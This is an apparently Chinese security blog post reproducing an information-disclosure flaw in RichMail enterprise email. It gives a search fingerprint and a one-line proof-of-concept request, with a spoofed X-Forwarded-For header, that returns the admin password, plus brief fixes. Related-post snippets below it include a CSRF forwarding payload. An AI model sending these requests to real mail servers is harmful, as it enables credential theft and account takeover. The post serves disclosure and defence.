【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

已于 2023-10-31 08:35:26 修改
阅读量1.6k 收藏 2
点赞数 1
分类专栏: 漏洞&预警 文章标签: 安全 web安全
于 2023-10-30 16:27:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MDSEC/article/details/134121871
版权

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

产品简介

Richmail是亚太本土最大的电子邮件系统提供商之一,是新一代智慧企业云邮件系统,以安全、稳定、高效著称。Richmail作为投资千万,自主研发的邮件系统,获得了多项发明专利,凭借移动化、套件化、能力开放及服务计量等等核心技术,持续引领全球邮箱领域的发展方向,每天数以亿计的智慧和信息在Richmail汇聚、碰撞、传递

漏洞简介

RichMail某版本存在信息泄漏漏洞,未经授权的攻击者可以利用此漏洞获取企业邮箱的账号密码信息,登陆管理后台。

指纹识别

"Richmail 企业邮箱"

poc

RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin

添加头 X-Forwarded-For: 127.0.0.1(这步可以视情况可省略)

/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书/根域名获取 errormsg 登录

漏洞复现

发送poc获取密码:

输入密码登陆后台:

漏洞修复

1.限制ip登陆

2.升级新版本

3.限制接口权限

漏洞收录

漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞。现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。

批量POC

https://github.com/MD-SEC/MDPOCS

微信公众号:猫蛋儿安全

github:MEDSEC

MDSEC
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
TurboMail viewfile 文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-18 45
TurboMail viewfile 文件读取漏洞(含批量验证poc)
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
国内邮箱服务器严重漏洞
weixin_30800807的博客
07-27 561
这几天学习了下邮箱服务器及邮件协议,发现了不少问题,于是就测试了一下各个大型邮箱服务商的服务器。(这个问题应该之前也有人发现的,可能我没找到把) 经过测试发现了一个非常严重的问题(至少我觉得已经非常严重了),就是可以完全伪造任何人的邮箱地址发送邮件,比如:system@163.com 发送给除163邮箱的大多数邮箱。 我测试了QQ、网易、新浪三家的邮箱服务器,都没有做任何的验证(腾讯的稍微好点...
邮件地址清洗工具
12-03
邮件地址清洗工具: 系统必须支持.NET 2.0 FrameWork 功能: 1、去除重复数据 2、去除无效邮件地址 3、去除错误邮件地址 4、去除指定后缀的邮件地址 5、去除指定字段值的邮件地址 6、扣除之前失败的邮件地址(通过文本文件) 7、分割行数导出 8、EDM系统报价 9、更多功能等待您的提出,Email:service@xmsijing.com
邮件系统漏洞
最新发布
m0_62207482的博客
03-30 490
作为当今世界上使用最为频繁的商务通信工具—— 邮件系统,更是屡屡遭受漏洞攻击的困扰,这不仅因为制造漏洞的途径多,还以为邮件系统的 互联网通信协议本身的问题。前者如程序员因为工作失误出现编码漏洞,毕竟人非机器,在紧 张复杂的工作过程中,难免有个闪失,除了人为因素,还有软件编码工具及编译器造成的错 误,不同应用程序彼此之间的相互作用,如大多数程序必须与其它API相交互,保存并检索文 件,同时运行在多种不同类型的设备上,都会可能产生漏洞;后者如互联网通信协议—TCP和UDP,其开放性常常引来黑客的攻击;
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 3130
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
漏洞复现是什么如何复现.txt
01-31
漏洞复现
漏洞复现是什么.txt
01-31
漏洞复现
漏洞复现的原理和解释.txt
01-31
漏洞复现
网易邮箱CSRF漏洞
swordheart的博客
04-11 4854
漏洞详情 披露情况: 2010-07-07-07-01-2007 细节已通知 2010-08-18: 细节向公众公开 简要描述: 网易存在 CSRF 漏洞,成功攻击可能会给用户带来多种数据。 详细说明: 网易126邮箱存在RF漏洞,攻击者一个发给126的邮箱,在邮件中需要用户嵌入一个自动攻击的图片,用户只要打开该邮件,就可以在邮箱中设置只发送给用户的邮箱。 <img src="http://config.mail.126.com/autofw/fwto.do?forwarddes=mai
邮箱伪造漏洞、钓鱼邮件漏洞(未添加SPF导致)
墨痕诉清风的博客
10-11 3600
目录 0x00 背景 0x01 细节 0x02测试方法 0x03漏洞利用 0x04防御 参考文献: 0x00 背景 邮箱伪造技术,可被用来做钓鱼攻击。 即伪造管理员或者IT运维部等邮箱发邮件,获取信任使对方打开附带的木马文件或者回复想要获取的敏感资料等。 0x01 细节 SMTP协议中,允许发件人伪造绝大多数的发件人特征信息。 这就导致了可以伪造别人发送邮件。 网上还有个网站比较方便直接发送伪造邮件的: http://emkei.cz/ 0x02测试方法 nsl.....
Linux下执行Windows编辑上传的Shell.sh脚本
u013032479的博客
12-13 630
上传文件到指定目录 将本脚本放到Linux某个目录下。 例如:/home/test/test.sh 通过 vi 编辑命令修改文件属性: 1.修改为可执行文件 :chmod +x test.sh。 2.“:set ff=unix” 或 “:set fileformat=unix” 修改解析器(Windows下编辑保存的文件默认是doc解析)。 3.“:x” 或 “:wq”保存退出。 执行脚本文件 例...
邮件服务器漏洞攻击,Exim邮件服务中的严重漏洞分析
weixin_33461476的博客
07-31 886
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。一、摘要在对Exim邮件服务器的最新更改进行代码审查期间(https://en.wikipedia.org/wiki/Exim),我们发现了一个RCE漏洞,版本4.87至4.91(含)。在这种特殊情况下,RCE表示远程*命令*执行,而不是远程执行代码:攻击者可以以root身份执行ex...
常见的网站漏洞
xysoul的专栏
04-18 6286
1. 注入漏洞  (1)sql注入。   (2 )xss ( cross site script) 跨站脚本攻击。   服务端:      echo $_GET['s'];   浏览器URL:    test.demo.com/index.php?s=(页面就会被注入js    脚本)  (3)命令注入漏洞。    通过GET提交的
QQ邮箱有漏洞
diantoujue2449的博客
10-02 420
今天我用QQ邮箱发了一封邮件, 随便用Fiddler软件偷窥了一下相关的数据包, 结果发现邮件内容倒是没泄露, 但邮件处理页面上的联系人信息在Fiddler里是一览无余, 以后再也不敢用QQ邮箱了! 转载于:https://www.cnblogs.com/king3/archive/2012/03/06/2381642.html...
ToDesk漏洞复现
09-23
ToDesk漏洞复现的具体步骤需要根据具体情况进行分析和测试,没有明确的引用内容提供相关信息。然而,一般来说,漏洞复现的基本步骤包括以下几个方面: 1. 收集信息:了解目标是什么,确定漏洞类型,并获取相关的文档和资料。 2. 漏洞分析:仔细研究漏洞的原理和攻击方法,分析目标系统的弱点和易受攻击的部分。 3. 搭建测试环境:在安全的测试环境中搭建目标系统的副本,以便随意测试和实施攻击。 4. 复现漏洞:根据已知的漏洞信息和攻击技术,尝试在测试环境中重现漏洞。这可能包括发送恶意数据、利用系统的弱点或执行其他攻击行为。 5. 分析结果:记录和分析攻击的效果和结果,包括成功获取敏感信息绕过访问控制等。 6. 提供修复建议:根据漏洞复现的结果,提供相应的修复建议和安全措施,以减少漏洞对目标系统的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值